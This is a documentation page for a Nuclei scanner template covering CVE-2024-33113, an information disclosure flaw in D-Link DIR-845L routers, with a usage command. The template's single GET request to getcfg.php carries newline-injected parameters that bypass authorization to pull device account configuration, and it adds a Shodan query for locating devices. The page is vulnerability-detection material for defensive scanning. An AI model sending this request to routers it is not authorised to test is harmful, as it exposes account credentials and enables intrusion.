D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure
ID: CVE-2024-33113
Severity: medium
Author: pussycat0x
Tags: cve,cve2024,dlink,info-leak
Description
Section titled “Description”D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.
YAML Source
Section titled “YAML Source”id: CVE-2024-33113
info: name: D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure author: pussycat0x severity: medium description: | D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php. reference: - https://github.com/FaLLenSKiLL1/CVE-2024-33113 - https://github.com/yj94/Yj_learning/blob/main/Week16/D-LINK-POC.md classification: epss-score: 0.00043 epss-percentile: 0.0866 cpe: cpe:2.3:h:dlink:dir-845l:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: "DIR-845L" product: dir-845l vendor: dlink tags: cve,cve2024,dlink,info-leak
http: - method: GET path: - "{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1"
matchers-condition: and matchers: - type: word part: body words: - "<service>DEVICE.ACCOUNT</service>" - "<seqno>" condition: and
- type: status status: - 200# digest: 4b0a00483046022100fb1ef020a9c458f3e3749669689433c5179639b08e2b6f9fa4a34b6a35ae3ff00221008a61eb3fe75d65c6c9ab022765b335cc8c40b26a2847125b6523fdc706387ec9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-33113.yaml"